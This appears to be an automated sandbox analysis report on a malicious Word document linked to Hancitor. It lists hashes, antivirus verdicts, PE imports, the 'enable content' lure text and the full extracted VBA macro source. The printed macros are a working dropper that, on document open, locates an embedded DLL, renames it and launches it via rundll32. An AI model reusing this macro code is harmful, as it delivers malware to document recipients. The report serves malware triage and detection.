Malicious
Classifications
Spyware Downloader Injector
Threat Names
Hancitor Mal/Generic-S Mal/HTMLGen-A VB:Trojan.Valyria.4987 +2
Dynamic Analysis Report
Created on 2021-07-07T02:46:00
0706_1643278086845.doc
Word Document
Remarks (1/1)
(0x0200000E): The overall sleep time of all monitored processes was truncated from "10 minutes" to "1 minute, 40 seconds" to reveal dormant functionality.
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
| Filters: |
There are no files for this filter
There are no files in this analysis
| File Name | Category | Type | Verdict | Actions |
|---|
| C:\Users\kEecfMwgj\Desktop\0706_1643278086845.doc | Sample File | Word Document |
malicious
|
...
|
»
| MIME Type | application/msword |
| File Size | 901.00 KB |
| MD5 |
62b2fb380e72bc0fb12a65b2798d83e3
|
| SHA1 |
d0804a455c0191585f18b9dc3e964117786858e3
|
| SHA256 |
e431a1bb2efcf6000f5bac4e19673d6deb9de7997dba5f65bae7779cd19e5caf
|
| SSDeep |
24576:XEIZ4wA74D4SQKxZcy8gthDWP+pwmUI+:X+wJD4QZh/qWamUI+
|
| ImpHash | - |
AV Matches (2)
»
| Threat Name | Verdict |
|---|---|
| VB:Trojan.Valyria.4987 |
malicious
|
| Gen:Variant.Zusy.391704 |
malicious
|
Office Information
»
| Creator | Mr.Administrator |
| Last Modified By | MyPc |
| Revision | 2 |
| Create Time | 2021-07-06 12:08:00+00:00 |
| Modify Time | 2021-07-06 12:08:00+00:00 |
| Codepage | ANSI_Latin1 |
| Application | Microsoft Office Word |
| App Version | 16.0 |
| Template | Normal.dotm |
| Document Security | NONE |
| Page Count | 1 |
| Line Count | 1 |
| Paragraph Count | 1 |
| Word Count | 3 |
| Character Count | 21 |
| Chars With Spaces | 23 |
| scale_crop | False |
| shared_doc | False |
Controls (2)
»
| CLSID | Control Name | Associated Vulnerability |
|---|---|---|
| {00020906-0000-0000-C000-000000000046} | Word97 | - |
| {0003000C-0000-0000-C000-000000000046} | Package | EmbeddedFile |
VBA Macros (3)
»
Macro #1: Module1
»
Attribute VB_Name = "Module1"
Dim pls As String
Sub ousx()
Call uoia(Options.DefaultFilePath(wdUserTemplatesPath))
End Sub
Sub nam(pafs As String)
Call ousx
Dim oxl
oxl = "\" & "niberius" & ".dll"
Name pafs As pls & oxl
End Sub
Sub uoia(fffs As String)
pls = fffs
End Sub
Sub Search(mds As Object, pafs As String)
Dim Nedc As Object
For Each Nedc In mds.SubFolders
Search Nedc, pafs
Next Nedc
Dim Ters As Object
For Each Ters In mds.Files
If Ters.Name = "nimb.dll" Then
pafs = Ters
End If
Next Ters
Exit Sub
ErrHandle:
Err.Clear
End Sub
Macro #2: Module3
»
Attribute VB_Name = "Module3"
Dim dfbvc As String
Sub bvxfcsd()
Call asda
Dim ewrwsdf As String
ewrwsdf = "L" & "o" & "c" & dfbvc & "mp"
ntgs = 50
sda = 49
While sda < 50
ntgs = ntgs - 1
If Dir(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf, vbDirectory) = "" Then
Else
sda = 61
End If
Wend
Call ThisDocument.hdhdd(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf)
End Sub
Sub asda()
dfbvc = "al" & "\Te"
End Sub
Macro #3: ThisDocument
»
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
Private Declare PtrSafe Function gc Lib "shell32" _
Alias "ShellExecuteA" (ByVal hwnd As Long, _
ByVal lpOperation As String, ByVal lpFile As String, _
ByVal lpParameters As String, ByVal lpDirectory As String, _
ByVal nShowCmd As Long) As Long
Dim hdv As String
Dim bbbb As String
Private Sub Document_Open()
Dim vcbc As String
Dim cx
cx = wdUserTemplatesPath
bbbb = "r"
vcbc = Options.DefaultFilePath(cx)
bbbb = bbbb & "u" & "n"
Call xz
If Dir(vcbc & "\niberius.dll") = "" Then
Call yyy
If Len(hdv) > 2 Then
Call nam(hdv)
Dim cvzz As String
cvzz = "l3" & "2"
gc 0, vbNullString, _
bbbb & cvzz, vcbc & "\niberius.d" & "ll,UBISYAYMQSE", _
vbNullString, 1
End If
End If
End Sub
Sub xz()
bbbb = bbbb & "dl"
End Sub
Sub hdhdd(asda As String)
Dim MyFSO As FileSystemObject
Dim MyFile As File
Dim SourceFolder As String
Dim DestinationFolder As String
Dim MyFolder As Folder
Dim MySubFolder As Folder
Set MyFSO = New Scripting.FileSystemObject
Call Search(MyFSO.GetFolder(asda), hdv)
End Sub
Sub yyy()
Selection.MoveDown Unit:=wdLine, Count:=3
Selection.MoveRight Unit:=wdCharacter, Count:=2
Selection.MoveDown Unit:=wdLine, Count:=3
Selection.MoveRight Unit:=wdCharacter, Count:=2
Selection.TypeBackspace
Selection.Copy
Call bvxfcsd
End Sub
Document Content
»
EMBED Package |
Extracted Image Texts (1)
»
Image 1: 0.PNG
»
, s document is protected
To open the document,
follow these steps:
This document is only available for desktop,
of laptop versions of Microsoft Office Word
Click Enable editing button from the yellow
bar above
Once you have enabled editing, pleas
Enable content Dutton from the yellow
above
CFB Streams (24)
»
| Name | ID | Size | Actions |
|---|---|---|---|
| Root\Data | 1 | 553.32 KB |
...
|
| Root\WordDocument | 2 | 4.00 KB |
...
|
| Root\ObjectPool\_1687053498\EPRINT | 5 | 4.86 KB |
...
|
| Root\ObjectPool\_1687053498\CompObj | 6 | 76 Bytes |
...
|
| Root\ObjectPool\_1687053498\ObjInfo | 7 | 6 Bytes |
...
|
| Root\ObjectPool\_1687053498\Ole10Native | 8 | 291.80 KB |
...
|
| Root\Table | 9 | 8.26 KB |
...
|
| Root\SummaryInformation | 10 | 424 Bytes |
...
|
| Root\DocumentSummaryInformation | 11 | 280 Bytes |
...
|
| Root\Macros\VBA\dir | 14 | 729 Bytes |
...
|
| Root\Macros\VBA\Module1 | 15 | 2.75 KB |
...
|
| Root\Macros\VBA\Module2 | 16 | 689 Bytes |
...
|
| Root\Macros\VBA\Module3 | 17 | 1.95 KB |
...
|
| Root\Macros\VBA\__SRP_0 | 18 | 2.95 KB |
...
|
| Root\Macros\VBA\__SRP_1 | 19 | 429 Bytes |
...
|
| Root\Macros\VBA\__SRP_2 | 20 | 1.82 KB |
...
|
| Root\Macros\VBA\__SRP_3 | 21 | 458 Bytes |
...
|
| Root\Macros\VBA\__SRP_4 | 22 | 630 Bytes |
...
|
| Root\Macros\VBA\__SRP_5 | 23 | 364 Bytes |
...
|
| Root\Macros\VBA\ThisDocument | 24 | 5.34 KB |
...
|
| Root\Macros\VBA\_VBA_PROJECT | 25 | 3.79 KB |
...
|
| Root\Macros\PROJECT | 26 | 515 Bytes |
...
|
| Root\Macros\PROJECTwm | 27 | 113 Bytes |
...
|
| Root\CompObj | 28 | 114 Bytes |
...
|
YARA Matches (2)
»
| Rule Name | Rule Description | Classification | Score | Actions |
|---|---|---|---|---|
| Document_Contains_Embedded_PE_File | PE file inside a document; possible malware dropper | - |
3/5
|
...
|
| Document_Contains_Embedded_PE_File | PE file inside a document; possible malware dropper | - |
3/5
|
...
|
| c:\users\keecfmwgj\appdata\local\temp\nimb.dll | Dropped File | Binary |
malicious
|
...
|
»
| Also Known As | c:\users\keecfmwgj\appdata\roaming\microsoft\templates\niberius.dll (Dropped File) |
| MIME Type | application/vnd.microsoft.portable-executable |
| File Size | 291.50 KB |
| MD5 |
de1021459d9a5e9cac660b874e84b899
|
| SHA1 |
c9f93fcc0eda1cd0479324718a1576001f04b9ad
|
| SHA256 |
b7c0e4ca9f7e6e177ff5dc3631cb16f7fcfddd49b1536dcc9db68b0ec472dea9
|
| SSDeep |
6144:FzU8/N+o/63hP1NcmZglxvDf7U9RG7yH+:mM+pwmWlhWQi+
|
| ImpHash |
66ea5ae56a1ad0183ee81e788900c71c
|
AV Matches (1)
»
| Threat Name | Verdict |
|---|---|
| Gen:Variant.Zusy.391704 |
malicious
|
PE Information
»
| Image Base | 0x1000000 |
| Entry Point | 0x101fc28 |
| Size Of Code | 0x32800 |
| Size Of Initialized Data | 0xb7600 |
| File Type | FileType.dll |
| Subsystem | Subsystem.windows_gui |
| Machine Type | MachineType.i386 |
| Compile Timestamp | 2014-06-30 14:33:09+00:00 |
Sections (5)
»
| Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
|---|---|---|---|---|---|---|
| .text | 0x1001000 | 0x327cf | 0x32800 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.66 |
| .rdata | 0x1034000 | 0x11208 | 0x11400 | 0x32c00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.76 |
| .data | 0x1046000 | 0xa2f2c | 0x1c00 | 0x44000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.92 |
| .rsrc | 0x10e9000 | 0x49d | 0x600 | 0x45c00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 3.4 |
| .reloc | 0x10ea000 | 0x2b68 | 0x2c00 | 0x46200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.69 |
Imports (3)
»
KERNEL32.dll (78)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| VirtualProtectEx | - | 0x1034000 | 0x449fc | 0x435fc | 0x4f0 |
| GetCurrentThreadId | - | 0x1034004 | 0x44a00 | 0x43600 | 0x1c5 |
| GetModuleFileNameA | - | 0x1034008 | 0x44a04 | 0x43604 | 0x213 |
| GetModuleHandleA | - | 0x103400c | 0x44a08 | 0x43608 | 0x215 |
| CreateProcessA | - | 0x1034010 | 0x44a0c | 0x4360c | 0xa4 |
| GetEnvironmentVariableA | - | 0x1034014 | 0x44a10 | 0x43610 | 0x1db |
| GetSystemDirectoryA | - | 0x1034018 | 0x44a14 | 0x43614 | 0x26f |
| GetTempPathA | - | 0x103401c | 0x44a18 | 0x43618 | 0x284 |
| GetWindowsDirectoryA | - | 0x1034020 | 0x44a1c | 0x4361c | 0x2ae |
| RemoveDirectoryA | - | 0x1034024 | 0x44a20 | 0x43620 | 0x400 |
| SetFileAttributesA | - | 0x1034028 | 0x44a24 | 0x43624 | 0x45e |
| SetConsoleCP | - | 0x103402c | 0x44a28 | 0x43628 | 0x42c |
| SetConsoleOutputCP | - | 0x1034030 | 0x44a2c | 0x4362c | 0x442 |
| CreateFileW | - | 0x1034034 | 0x44a30 | 0x43630 | 0x8f |
| ReadConsoleW | - | 0x1034038 | 0x44a34 | 0x43634 | 0x3be |
| WriteConsoleW | - | 0x103403c | 0x44a38 | 0x43638 | 0x524 |
| SetStdHandle | - | 0x1034040 | 0x44a3c | 0x4363c | 0x487 |
| OutputDebugStringW | - | 0x1034044 | 0x44a40 | 0x43640 | 0x38a |
| LoadLibraryExW | - | 0x1034048 | 0x44a44 | 0x43644 | 0x33e |
| SetFilePointerEx | - | 0x103404c | 0x44a48 | 0x43648 | 0x467 |
| ReadFile | - | 0x1034050 | 0x44a4c | 0x4364c | 0x3c0 |
| GetConsoleMode | - | 0x1034054 | 0x44a50 | 0x43650 | 0x1ac |
| WideCharToMultiByte | - | 0x1034058 | 0x44a54 | 0x43654 | 0x511 |
| EnterCriticalSection | - | 0x103405c | 0x44a58 | 0x43658 | 0xee |
| LeaveCriticalSection | - | 0x1034060 | 0x44a5c | 0x4365c | 0x339 |
| DeleteCriticalSection | - | 0x1034064 | 0x44a60 | 0x43660 | 0xd1 |
| EncodePointer | - | 0x1034068 | 0x44a64 | 0x43664 | 0xea |
| DecodePointer | - | 0x103406c | 0x44a68 | 0x43668 | 0xca |
| MultiByteToWideChar | - | 0x1034070 | 0x44a6c | 0x4366c | 0x367 |
| GetStringTypeW | - | 0x1034074 | 0x44a70 | 0x43670 | 0x269 |
| GetLastError | - | 0x1034078 | 0x44a74 | 0x43674 | 0x202 |
| HeapFree | - | 0x103407c | 0x44a78 | 0x43678 | 0x2cf |
| HeapAlloc | - | 0x1034080 | 0x44a7c | 0x4367c | 0x2cb |
| RaiseException | - | 0x1034084 | 0x44a80 | 0x43680 | 0x3b1 |
| RtlUnwind | - | 0x1034088 | 0x44a84 | 0x43684 | 0x418 |
| GetCommandLineA | - | 0x103408c | 0x44a88 | 0x43688 | 0x186 |
| GetCPInfo | - | 0x1034090 | 0x44a8c | 0x4368c | 0x172 |
| UnhandledExceptionFilter | - | 0x1034094 | 0x44a90 | 0x43690 | 0x4d3 |
| SetUnhandledExceptionFilter | - | 0x1034098 | 0x44a94 | 0x43694 | 0x4a5 |
| SetLastError | - | 0x103409c | 0x44a98 | 0x43698 | 0x473 |
| InitializeCriticalSectionAndSpinCount | - | 0x10340a0 | 0x44a9c | 0x4369c | 0x2e3 |
| Sleep | - | 0x10340a4 | 0x44aa0 | 0x436a0 | 0x4b2 |
| GetCurrentProcess | - | 0x10340a8 | 0x44aa4 | 0x436a4 | 0x1c0 |
| TerminateProcess | - | 0x10340ac | 0x44aa8 | 0x436a8 | 0x4c0 |
| TlsAlloc | - | 0x10340b0 | 0x44aac | 0x436ac | 0x4c5 |
| TlsGetValue | - | 0x10340b4 | 0x44ab0 | 0x436b0 | 0x4c7 |
| TlsSetValue | - | 0x10340b8 | 0x44ab4 | 0x436b4 | 0x4c8 |
| TlsFree | - | 0x10340bc | 0x44ab8 | 0x436b8 | 0x4c6 |
| GetStartupInfoW | - | 0x10340c0 | 0x44abc | 0x436bc | 0x263 |
| GetModuleHandleW | - | 0x10340c4 | 0x44ac0 | 0x436c0 | 0x218 |
| GetProcAddress | - | 0x10340c8 | 0x44ac4 | 0x436c4 | 0x245 |
| IsProcessorFeaturePresent | - | 0x10340cc | 0x44ac8 | 0x436c8 | 0x304 |
| LCMapStringW | - | 0x10340d0 | 0x44acc | 0x436cc | 0x32d |
| GetLocaleInfoW | - | 0x10340d4 | 0x44ad0 | 0x436d0 | 0x206 |
| IsValidLocale | - | 0x10340d8 | 0x44ad4 | 0x436d4 | 0x30c |
| GetUserDefaultLCID | - | 0x10340dc | 0x44ad8 | 0x436d8 | 0x29b |
| EnumSystemLocalesW | - | 0x10340e0 | 0x44adc | 0x436dc | 0x10f |
| ExitProcess | - | 0x10340e4 | 0x44ae0 | 0x436e0 | 0x119 |
| GetModuleHandleExW | - | 0x10340e8 | 0x44ae4 | 0x436e4 | 0x217 |
| HeapSize | - | 0x10340ec | 0x44ae8 | 0x436e8 | 0x2d4 |
| GetProcessHeap | - | 0x10340f0 | 0x44aec | 0x436ec | 0x24a |
| GetStdHandle | - | 0x10340f4 | 0x44af0 | 0x436f0 | 0x264 |
| WriteFile | - | 0x10340f8 | 0x44af4 | 0x436f4 | 0x525 |
| GetModuleFileNameW | - | 0x10340fc | 0x44af8 | 0x436f8 | 0x214 |
| IsValidCodePage | - | 0x1034100 | 0x44afc | 0x436fc | 0x30a |
| GetACP | - | 0x1034104 | 0x44b00 | 0x43700 | 0x168 |
| GetOEMCP | - | 0x1034108 | 0x44b04 | 0x43704 | 0x237 |
| IsDebuggerPresent | - | 0x103410c | 0x44b08 | 0x43708 | 0x300 |
| GetFileType | - | 0x1034110 | 0x44b0c | 0x4370c | 0x1f3 |
| QueryPerformanceCounter | - | 0x1034114 | 0x44b10 | 0x43710 | 0x3a7 |
| GetCurrentProcessId | - | 0x1034118 | 0x44b14 | 0x43714 | 0x1c1 |
| GetSystemTimeAsFileTime | - | 0x103411c | 0x44b18 | 0x43718 | 0x279 |
| GetEnvironmentStringsW | - | 0x1034120 | 0x44b1c | 0x4371c | 0x1da |
| FreeEnvironmentStringsW | - | 0x1034124 | 0x44b20 | 0x43720 | 0x161 |
| HeapReAlloc | - | 0x1034128 | 0x44b24 | 0x43724 | 0x2d2 |
| CloseHandle | - | 0x103412c | 0x44b28 | 0x43728 | 0x52 |
| FlushFileBuffers | - | 0x1034130 | 0x44b2c | 0x4372c | 0x157 |
| GetConsoleCP | - | 0x1034134 | 0x44b30 | 0x43730 | 0x19a |
USER32.dll (8)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| CreateDialogIndirectParamA | - | 0x103413c | 0x44b38 | 0x43738 | 0x5f |
| DialogBoxIndirectParamW | - | 0x1034140 | 0x44b3c | 0x4373c | 0xa8 |
| GetDesktopWindow | - | 0x1034144 | 0x44b40 | 0x43740 | 0x123 |
| GetSysColorBrush | - | 0x1034148 | 0x44b44 | 0x43744 | 0x17c |
| GetWindowRect | - | 0x103414c | 0x44b48 | 0x43748 | 0x19c |
| GetClientRect | - | 0x1034150 | 0x44b4c | 0x4374c | 0x114 |
| GetForegroundWindow | - | 0x1034154 | 0x44b50 | 0x43750 | 0x12d |
| CreatePopupMenu | - | 0x1034158 | 0x44b54 | 0x43754 | 0x6b |
ole32.dll (2)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| OleUninitialize | - | 0x1034160 | 0x44b5c | 0x4375c | 0x149 |
| OleInitialize | - | 0x1034164 | 0x44b60 | 0x43760 | 0x132 |
Exports (4)
»
| Api name | EAT Address | Ordinal |
|---|---|---|
| Closewhether | 0x136a0 | 0x1 |
| Meantduck | 0x14b80 | 0x2 |
| My | 0x14960 | 0x3 |
| Ropemay | 0x14850 | 0x4 |
| dee4bb7d46bbbec6c01dc41349cb8826b27be9a0dcf39816ca8bd6e0a39c2019 | Downloaded File | Binary |
malicious
|
...
|
»
| Parent File | analysis.pcap |
| MIME Type | application/vnd.microsoft.portable-executable |
| File Size | 266.51 KB |
| MD5 |
270c3859591599642bd15167765246e3
|
| SHA1 |
e227a8a338166dc97e360ca9cddda5e007079c58
|
| SHA256 |
dee4bb7d46bbbec6c01dc41349cb8826b27be9a0dcf39816ca8bd6e0a39c2019
|
| SSDeep |
6144:Rxa4Hg2gf0jOrkOWnNwZvbMoq2T4qi+AHPHrr:JHg727Nwyo9Av/
|
| ImpHash |
cb664df5fa904736e15ac44ff006d780
|
File Reputation Information
»
| Verdict |
malicious
|
| Names | Mal/Generic-S |
AV Matches (1)
»
| Threat Name | Verdict |
|---|---|
| Gen:Variant.Doina.7190 |
malicious
|
PE Information
»
| Image Base | 0x400000 |
| Entry Point | 0x401480 |
| Size Of Code | 0x35000 |
| Size Of Initialized Data | 0x42600 |
| Size Of Uninitialized Data | 0x600 |
| File Type | FileType.executable |
| Subsystem | Subsystem.windows_gui |
| Machine Type | MachineType.i386 |
| Compile Timestamp | 1970-01-01 00:00:00+00:00 |
Sections (8)
»
| Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
|---|---|---|---|---|---|---|
| .text | 0x401000 | 0x34f44 | 0x35000 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.53 |
| .data | 0x436000 | 0x38 | 0x200 | 0x35400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.51 |
| .rdata | 0x437000 | 0x2da8 | 0x2e00 | 0x35600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ | 6.92 |
| /4 | 0x43a000 | 0x9014 | 0x9200 | 0x38400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ | 4.47 |
| .bss | 0x444000 | 0x440 | 0x0 | 0x0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
| .idata | 0x445000 | 0xea4 | 0x1000 | 0x41600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.98 |
| .CRT | 0x446000 | 0x38 | 0x200 | 0x42600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.33 |
| .tls | 0x447000 | 0x8 | 0x200 | 0x42800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0 |
Imports (8)
»
KERNEL32.dll (9)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| GetCurrentProcess | - | 0x4452b4 | 0x450b4 | 0x416b4 | 0x1c8 |
| GetCurrentProcessId | - | 0x4452b8 | 0x450b8 | 0x416b8 | 0x1c9 |
| GetCurrentThreadId | - | 0x4452bc | 0x450bc | 0x416bc | 0x1cd |
| GetTickCount | - | 0x4452c0 | 0x450c0 | 0x416c0 | 0x29b |
| QueryPerformanceCounter | - | 0x4452c4 | 0x450c4 | 0x416c4 | 0x3b6 |
| TerminateProcess | - | 0x4452c8 | 0x450c8 | 0x416c8 | 0x4a7 |
| UnhandledExceptionFilter | - | 0x4452cc | 0x450cc | 0x416cc | 0x4bb |
| VirtualProtect | - | 0x4452d0 | 0x450d0 | 0x416d0 | 0x4dc |
| VirtualQuery | - | 0x4452d4 | 0x450d4 | 0x416d4 | 0x4df |
msvcrt.dll (29)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| __getmainargs | - | 0x4452dc | 0x450dc | 0x416dc | 0x3b |
| __initenv | - | 0x4452e0 | 0x450e0 | 0x416e0 | 0x3c |
| __lconv_init | - | 0x4452e4 | 0x450e4 | 0x416e4 | 0x45 |
| __p__acmdln | - | 0x4452e8 | 0x450e8 | 0x416e8 | 0x4d |
| __p__fmode | - | 0x4452ec | 0x450ec | 0x416ec | 0x54 |
| __set_app_type | - | 0x4452f0 | 0x450f0 | 0x416f0 | 0x69 |
| __setusermatherr | - | 0x4452f4 | 0x450f4 | 0x416f4 | 0x6c |
| _amsg_exit | - | 0x4452f8 | 0x450f8 | 0x416f8 | 0x91 |
| _cexit | - | 0x4452fc | 0x450fc | 0x416fc | 0xa2 |
| _fmode | - | 0x445300 | 0x45100 | 0x41700 | 0x114 |
| _fpreset | - | 0x445304 | 0x45104 | 0x41704 | 0x118 |
| _initterm | - | 0x445308 | 0x45108 | 0x41708 | 0x160 |
| _iob | - | 0x44530c | 0x4510c | 0x4170c | 0x164 |
| _onexit | - | 0x445310 | 0x45110 | 0x41710 | 0x274 |
| abort | - | 0x445314 | 0x45114 | 0x41714 | 0x421 |
| calloc | - | 0x445318 | 0x45118 | 0x41718 | 0x42e |
| exit | - | 0x44531c | 0x4511c | 0x4171c | 0x439 |
| fprintf | - | 0x445320 | 0x45120 | 0x41720 | 0x449 |
| free | - | 0x445324 | 0x45124 | 0x41724 | 0x450 |
| fwrite | - | 0x445328 | 0x45128 | 0x41728 | 0x45c |
| malloc | - | 0x44532c | 0x4512c | 0x4172c | 0x48b |
| memcmp | - | 0x445330 | 0x45130 | 0x41730 | 0x493 |
| memcpy | - | 0x445334 | 0x45134 | 0x41734 | 0x494 |
| memmove | - | 0x445338 | 0x45138 | 0x41738 | 0x495 |
| memset | - | 0x44533c | 0x4513c | 0x4173c | 0x496 |
| signal | - | 0x445340 | 0x45140 | 0x41740 | 0x4af |
| strlen | - | 0x445344 | 0x45144 | 0x41744 | 0x4c3 |
| strncmp | - | 0x445348 | 0x45148 | 0x41748 | 0x4c6 |
| vfprintf | - | 0x44534c | 0x4514c | 0x4174c | 0x4e5 |
WS2_32.dll (13)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| WSACleanup | - | 0x445354 | 0x45154 | 0x41754 | 0x1b |
| WSAGetLastError | - | 0x445358 | 0x45158 | 0x41758 | 0x2c |
| WSASocketW | - | 0x44535c | 0x4515c | 0x4175c | 0x54 |
| WSAStartup | - | 0x445360 | 0x45160 | 0x41760 | 0x55 |
| closesocket | - | 0x445364 | 0x45164 | 0x41764 | 0x87 |
| connect | - | 0x445368 | 0x45168 | 0x41768 | 0x88 |
| freeaddrinfo | - | 0x44536c | 0x4516c | 0x4176c | 0x89 |
| getaddrinfo | - | 0x445370 | 0x45170 | 0x41770 | 0x8a |
| ioctlsocket | - | 0x445374 | 0x45174 | 0x41774 | 0x9c |
| recv | - | 0x445378 | 0x45178 | 0x41778 | 0xa0 |
| send | - | 0x44537c | 0x4517c | 0x4177c | 0xa3 |
| setsockopt | - | 0x445380 | 0x45180 | 0x41780 | 0xa5 |
| shutdown | - | 0x445384 | 0x45184 | 0x41784 | 0xa6 |
ADVAPI32.dll (5)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| RegCloseKey | - | 0x44538c | 0x4518c | 0x4178c | 0x235 |
| RegEnumKeyExW | - | 0x445390 | 0x45190 | 0x41790 | 0x254 |
| RegOpenKeyExW | - | 0x445394 | 0x45194 | 0x41794 | 0x266 |
| RegQueryInfoKeyW | - | 0x445398 | 0x45198 | 0x41798 | 0x26d |
| RegQueryValueExW | - | 0x44539c | 0x4519c | 0x4179c | 0x273 |
CRYPT32.dll (1)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| CryptUnprotectData | - | 0x4453a4 | 0x451a4 | 0x417a4 | 0xda |
GDI32.dll (7)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
|---|---|---|---|---|---|
| BitBlt | - | 0x4453ac | 0x451ac | 0x417ac | 0xc |
